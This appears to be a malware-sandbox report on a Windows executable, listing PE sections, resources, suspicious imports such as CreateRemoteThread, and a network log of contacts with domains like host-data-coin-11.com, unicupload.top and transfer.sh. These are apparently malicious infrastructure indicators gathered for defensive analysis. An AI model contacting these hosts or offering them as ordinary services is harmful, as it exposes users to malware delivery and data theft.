                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91100x40.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x348.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x3e7560x3e800False0.58257421875data6.96623040888IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                            .data0x400000x10c9880x1800False0.341145833333data3.46431598321IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .tad0x14d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .lux0x14e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .civujo0x14f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0x1500000x83d00x8400False0.597212357955data5.82312083073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0x1590000x465c0x4800False0.347927517361data3.69266698613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                            AFX_DIALOG_LAYOUT0x156ce80x2dataDutchNetherlands
                                                                                                            AFX_DIALOG_LAYOUT0x156ce00x2dataDutchNetherlands
                                                                                                            AFX_DIALOG_LAYOUT0x156cf00x2dataDutchNetherlands
                                                                                                            AFX_DIALOG_LAYOUT0x156cf80x2dataDutchNetherlands
                                                                                                            CIDAFICUDUROSOTAROM0x1565c80x6c7ASCII text, with very long lines, with no line terminatorsAssameseIndia
                                                                                                            RT_CURSOR0x156d000x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                                                                                            RT_ICON0x1506e00x6c8dataAssameseIndia
                                                                                                            RT_ICON0x150da80x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                            RT_ICON0x1513100x10a8dataAssameseIndia
                                                                                                            RT_ICON0x1523b80x988dBase III DBT, version number 0, next free block index 40AssameseIndia
                                                                                                            RT_ICON0x152d400x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                            RT_ICON0x1531f80x8a8dataAssameseIndia
                                                                                                            RT_ICON0x153aa00x6c8dataAssameseIndia
                                                                                                            RT_ICON0x1541680x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                            RT_ICON0x1546d00x10a8dataAssameseIndia
                                                                                                            RT_ICON0x1557780x988dataAssameseIndia
                                                                                                            RT_ICON0x1561000x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                            RT_STRING0x1575c00xe4dataDutchNetherlands
                                                                                                            RT_STRING0x1576a80x3bcdataDutchNetherlands
                                                                                                            RT_STRING0x157a680x6e6dataDutchNetherlands
                                                                                                            RT_STRING0x1581500x1a0dataDutchNetherlands
                                                                                                            RT_STRING0x1582f00xdcdataDutchNetherlands
                                                                                                            RT_ACCELERATOR0x156ca00x10dataDutchNetherlands
                                                                                                            RT_ACCELERATOR0x156c900x10dataDutchNetherlands
                                                                                                            RT_GROUP_CURSOR0x1575a80x14dataDutchNetherlands
                                                                                                            RT_GROUP_ICON0x1531a80x4cdataAssameseIndia
                                                                                                            RT_GROUP_ICON0x1565680x5adataAssameseIndia
                                                                                                            None0x156cc00xadataDutchNetherlands
                                                                                                            None0x156cd00xadataDutchNetherlands
                                                                                                            None0x156cb00xadataDutchNetherlands

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            KERNEL32.dllCallNamedPipeW, TerminateProcess, GetExitCodeProcess, DeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, GetConsoleCursorInfo, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetProcessVersion, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

                                                                                                            Possible Origin

                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            DutchNetherlands
                                                                                                            AssameseIndia

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 14, 2022 13:58:53.549886942 CET4977580192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:53.569924116 CET80497758.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:53.570055008 CET4977580192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:53.570254087 CET4977580192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:53.570290089 CET4977580192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:53.587796926 CET80497758.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:53.693064928 CET80497758.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:53.693109035 CET80497758.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:53.693213940 CET4977580192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:53.694268942 CET4977580192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:53.714025974 CET80497758.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:53.999017954 CET4977680192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.017983913 CET80497768.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:54.018285036 CET4977680192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.018491983 CET4977680192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.018687010 CET4977680192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.036034107 CET80497768.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:54.036067009 CET80497768.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:54.137383938 CET80497768.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:54.137490034 CET4977680192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.137804031 CET4977680192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.155479908 CET80497768.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:54.440464973 CET4977780192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.457777023 CET80497778.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:54.457951069 CET4977780192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.458961010 CET4977780192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.458983898 CET4977780192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.476219893 CET80497778.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:54.579741955 CET80497778.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:54.579868078 CET4977780192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.580240965 CET4977780192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:54.599031925 CET80497778.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.028954983 CET4977880192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.046314955 CET80497788.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.046483994 CET4977880192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.046607018 CET4977880192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.046617985 CET4977880192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.063810110 CET80497788.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.166625977 CET80497788.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.166662931 CET80497788.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.166717052 CET4977880192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.166989088 CET4977880192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.184209108 CET80497788.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.197638035 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.214900017 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.215178013 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.215187073 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.215615988 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.232429981 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.232738018 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.333425999 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.333884001 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.333910942 CET4977980192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.351144075 CET80497798.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.370124102 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.387273073 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.387356997 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.387542963 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.387581110 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.421509981 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.421547890 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.508378029 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.508536100 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.508923054 CET4978080192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:55.520525932 CET4978180192.168.2.3185.186.142.166
                                                                                                            Jan 14, 2022 13:58:55.526056051 CET80497808.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:55.576786041 CET8049781185.186.142.166192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.081492901 CET4978180192.168.2.3185.186.142.166
                                                                                                            Jan 14, 2022 13:58:56.137991905 CET8049781185.186.142.166192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.643996000 CET4978180192.168.2.3185.186.142.166
                                                                                                            Jan 14, 2022 13:58:56.701874971 CET8049781185.186.142.166192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.769278049 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.786422014 CET80497828.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.786525011 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.786631107 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.786664009 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.803860903 CET80497828.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.906481981 CET80497828.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.906631947 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.906946898 CET4978280192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.925153971 CET80497828.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.935576916 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.954091072 CET80497838.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:56.954193115 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.954328060 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.954360962 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:56.971613884 CET80497838.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:57.071717024 CET80497838.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:57.071855068 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:57.072341919 CET4978380192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:58:57.091332912 CET80497838.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:58:57.438575983 CET4978480192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:59:00.441234112 CET4978480192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:59:00.458499908 CET80497848.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:59:00.459135056 CET4978480192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:59:00.459331989 CET4978480192.168.2.38.209.70.0
                                                                                                            Jan 14, 2022 13:59:00.517858982 CET80497848.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:59:00.561033964 CET80497848.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:59:00.561052084 CET80497848.209.70.0192.168.2.3
                                                                                                            Jan 14, 2022 13:59:00.561069012 CET80497848.209.70.0192.168.2.3

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                            Jan 14, 2022 13:58:53.260260105 CET192.168.2.38.8.8.80x3c03Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:53.708993912 CET192.168.2.38.8.8.80x59aeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:54.152388096 CET192.168.2.38.8.8.80xeea9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:54.600578070 CET192.168.2.38.8.8.80xc87aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:55.176249981 CET192.168.2.38.8.8.80x3339Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:55.350025892 CET192.168.2.38.8.8.80xc30cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:56.748620987 CET192.168.2.38.8.8.80xe92aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:56.916774035 CET192.168.2.38.8.8.80x406dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:57.091743946 CET192.168.2.38.8.8.80x5486Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:01.984139919 CET192.168.2.38.8.8.80x377bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:02.226161957 CET192.168.2.38.8.8.80xd52eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:02.495044947 CET192.168.2.38.8.8.80xd9b2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:03.614922047 CET192.168.2.38.8.8.80x5a92Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:03.849128962 CET192.168.2.38.8.8.80xae9fStandard query (0)privacy-tools-for-you-780.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:05.220077038 CET192.168.2.38.8.8.80xae9fStandard query (0)privacy-tools-for-you-780.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:06.978780031 CET192.168.2.38.8.8.80x8c4bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.150871992 CET192.168.2.38.8.8.80x3c08Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.323868990 CET192.168.2.38.8.8.80x96d9Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.548402071 CET192.168.2.38.8.8.80xa642Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.716831923 CET192.168.2.38.8.8.80x16fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.880069971 CET192.168.2.38.8.8.80x6064Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:08.048026085 CET192.168.2.38.8.8.80x5295Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:08.214258909 CET192.168.2.38.8.8.80x8ac3Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:10.068484068 CET192.168.2.38.8.8.80xd7baStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:10.264724016 CET192.168.2.38.8.8.80xa8dbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:10.880444050 CET192.168.2.38.8.8.80x4cf2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:11.389574051 CET192.168.2.38.8.8.80x6d73Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:13.573808908 CET192.168.2.38.8.8.80x78d9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:13.742561102 CET192.168.2.38.8.8.80x527eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:13.907990932 CET192.168.2.38.8.8.80xfcd7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:14.116682053 CET192.168.2.38.8.8.80x439eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:18.014628887 CET192.168.2.38.8.8.80xdc8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:18.222428083 CET192.168.2.38.8.8.80x13b1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:18.427845955 CET192.168.2.38.8.8.80x3ba6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:39.986620903 CET192.168.2.38.8.8.80xad11Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:40.566854954 CET192.168.2.38.8.8.80xa2fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:40.800518036 CET192.168.2.38.8.8.80x522fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.198199034 CET192.168.2.38.8.8.80xe169Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.388201952 CET192.168.2.38.8.8.80x2944Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.600965023 CET192.168.2.38.8.8.80x5775Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.790718079 CET192.168.2.38.8.8.80x98e8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.984402895 CET192.168.2.38.8.8.80xf863Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:43.252228975 CET192.168.2.38.8.8.80x1351Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:43.448209047 CET192.168.2.38.8.8.80x8c40Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:43.757477999 CET192.168.2.38.8.8.80x609fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:44.071616888 CET192.168.2.38.8.8.80x5705Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:44.276002884 CET192.168.2.38.8.8.80x752bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:44.734683990 CET192.168.2.38.8.8.80x4bfbStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:46.515445948 CET192.168.2.38.8.8.80x8865Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:46.708954096 CET192.168.2.38.8.8.80xcff2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:47.107867002 CET192.168.2.38.8.8.80xdf5fStandard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:47.683250904 CET192.168.2.38.8.8.80x8325Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:47.858074903 CET192.168.2.38.8.8.80x492aStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.043952942 CET192.168.2.38.8.8.80x852dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.292716980 CET192.168.2.38.8.8.80x6f9eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.464782000 CET192.168.2.38.8.8.80x8624Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.693960905 CET192.168.2.38.8.8.80xec81Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.977354050 CET192.168.2.38.8.8.80xeef8Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:50.308330059 CET192.168.2.38.8.8.80x2db8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:50.510072947 CET192.168.2.38.8.8.80x8e7bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:52.339437962 CET192.168.2.38.8.8.80xc02aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:52.766990900 CET192.168.2.38.8.8.80xc0fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:52.990679026 CET192.168.2.38.8.8.80xe6a3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:53.387569904 CET192.168.2.38.8.8.80x43c6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:53.887733936 CET192.168.2.38.8.8.80x4d58Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:57.324872971 CET192.168.2.38.8.8.80x35abStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:57.495378971 CET192.168.2.38.8.8.80x27c5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:58.096651077 CET192.168.2.38.8.8.80x905aStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:59.126961946 CET192.168.2.38.8.8.80x905aStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.069653988 CET192.168.2.38.8.8.80x9da2Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.617562056 CET192.168.2.38.8.8.80xa04dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.927841902 CET192.168.2.38.8.8.80xcc76Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:05.279290915 CET192.168.2.38.8.8.80xe601Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:09.830545902 CET192.168.2.38.8.8.80x4a2bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
